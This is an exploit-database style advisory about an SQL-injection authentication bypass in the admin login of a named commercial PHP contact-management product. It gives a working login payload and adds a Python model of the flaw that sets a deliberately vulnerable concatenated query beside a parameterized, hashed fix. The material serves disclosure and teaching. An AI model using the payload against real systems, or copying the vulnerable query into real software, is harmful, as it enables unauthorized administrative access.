Rae Media Contact MS - Authentication Bypass

Author: b3hz4d
type: webapps
platform: php
date_added: 2008-12-02 
date_updated: 2017-01-04 
verified: 1 
codes: OSVDB-50411;CVE-2008-6389 

        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                         +
        + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability  +
        +                                                                         +
        +                        Discovered by b3hz4d                             +
        +                                                                         +
        +                        WwW.DeltaHacking.Net                             +
        +                                                                         +
        +                                                                         +
        +                                                                         +
        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


                              APA Center of Yazd University
                                 (https://www.ircert.cc)


AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 03 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR        : http://www.aliensoftcorp.com/
DEMO          : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln    :

              Admin login page

              All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.

              All Demo links are here:

              http://www.aliensoftcorp.com/contactmanager.htm

[+] Exploit :
              USER: anything

              PASS: delta' or 'a'='a
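
The advisory lists only the login inputs, not the application's code. The Python model below is an added example, not the vendor's source (the product itself is PHP): it assumes the admin check concatenates both fields into one SQL string, shows why the PASS value above then matches every row, and sets a parameterized, hash-comparing check beside it. The table, column and function names and the sample account are hypothetical.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-salt"  # constructed value; use a random per-user salt in practice

def pw_hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

def make_db() -> sqlite3.Connection:
    # Constructed sample data; the real application's schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT, pw_hash BLOB)")
    db.execute("INSERT INTO admins VALUES (?, ?, ?)",
               ("admin", "S3cret!", pw_hash("S3cret!")))
    return db

def login_vulnerable(db, user: str, password: str) -> bool:
    # Assumed shape of the flawed check: input concatenated into the SQL text.
    sql = ("SELECT username FROM admins WHERE username = '%s' AND password = '%s'"
           % (user, password))
    # With the advisory's PASS value the WHERE clause becomes
    #   username = 'anything' AND password = 'delta' or 'a'='a'
    # AND binds tighter than OR, so the trailing OR term is true for every row.
    return db.execute(sql).fetchone() is not None

def login_hardened(db, user: str, password: str) -> bool:
    # Bound parameter: the input is data, never part of the SQL grammar.
    row = db.execute("SELECT pw_hash FROM admins WHERE username = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    # Compare a salted hash in constant time instead of matching in SQL.
    return hmac.compare_digest(row[0], pw_hash(password))

def demo() -> dict:
    # Each result is (vulnerable check, hardened check).
    db = make_db()
    cases = {"valid": ("admin", "S3cret!"),
             "wrong": ("admin", "nope"),
             "advisory": ("anything", "delta' or 'a'='a")}
    return {name: (login_vulnerable(db, u, p), login_hardened(db, u, p))
            for name, (u, p) in cases.items()}

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```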


###########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all members in DeltaHacking.Net & Snoop-Security.Com #

###########################################################################################################

# milw0rm.com [2008-12-03]